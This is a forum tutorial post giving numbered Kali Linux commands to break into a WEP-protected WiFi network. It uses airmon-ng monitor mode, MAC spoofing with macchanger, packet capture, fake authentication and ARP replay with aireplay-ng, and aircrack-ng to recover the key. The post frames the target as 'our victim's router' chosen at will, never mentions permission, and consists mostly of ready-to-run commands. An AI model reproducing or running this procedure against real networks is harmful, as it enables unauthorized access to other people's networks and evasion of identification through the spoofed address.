Black Gold
Well-known member
Nov 26, 2018
For this tutorial you need an external WiFi adapter or Kali installed on your hard drive, not in a virtual machine. Otherwise, look for the method using the normal Windows OS in the intermediate section.
Start up Kali, log in, and then follow the steps below.
Step 1: Open console and type the following to start up network connections.
/etc/init.d/networking start
Step 2: Now we are going to put the network card into monitor mode by typing the following.
airmon-ng
(You will find your Interface here)
Step 3: So first start up the scan
airmon-ng start wlan0
or
airmon-ng start wlan1
(this command depends on what it reads on your router or networking card as, replace as needed)
Step 4: Let's spoof your MAC address first by typing this next command.
ifconfig wlan1 down
macchanger -r wlan1
ifconfig wlan1 up
This will change the MAC address presented to the computer we are connecting to.
Step 5: Time to start finding our victim’s router, type the following in console.
airodump-ng mon0
This will show the entire list of all the WiFi connections your adapter can catch. Once you find one that suits your interest, continue:
Step 6: Once found, press CTRL + C to copy the BSSID, get out of airodump, and then type into a new console (read carefully!):
airodump-ng -c [channel number] --bssid [the BSSID of the router] -w [new name for the cap file] mon0 (the interface we are using)
For Example:
airodump-ng -c 1 --bssid 11:22:33:44:55:66 -w Newcapfile mon0
(*IMPORTANT: You have to fill in everything between [ ] yourself, since it is different for every case. You will get the BSSID and channel number from the previous steps, ‘mon0’ or ‘mon1’ based on your adapter, and for the name of the cap file you can type in any file name like ‘MyCapFile’.)
Step 7: Let's start the passphrase cracking. We need to get around 30,000-50,000 IVs (packets). We start by sending fake authentication requests. To do this, open a new console and type:
aireplay-ng -1 1 -a [The BSSID of the router] mon0
For example:
aireplay-ng -1 1 -a 11:22:33:44:55:66 mon0
Step 8: Almost done, we just need to continue the capturing process. Open another console and type:
aireplay-ng -3 -b [The BSSID of the router] mon0
Now it will start replaying ARPs. (ARP = Address Resolution Protocol; it is needed to find the device address from the IP address.)
Collect a good amount of IVs, around 30,000-50,000 (the more the better). Depending on the network strength, this step can take anywhere from 15 minutes to about 3 hours. They should be stored in the .cap file. Once you've captured enough packets, press CTRL + C to stop the process and continue to step 9.
Step 9: Time to start cracking that cap file. You can think of it like this: every single packet contains a bit of leaked password. So we've captured a large number of packets, compiled them in the .cap file, and now we're going to try to find the tiny bits of information in each packet and piece them together to give us the passphrase. Open a new console and type:
aircrack-ng -b [bssid] [file name]-01.cap
For example:
aircrack-ng -b 11:22:33:44:55:66 wepcap-01.cap
Step 10: Wait a few seconds and we should now be presented with the key to log in to the router.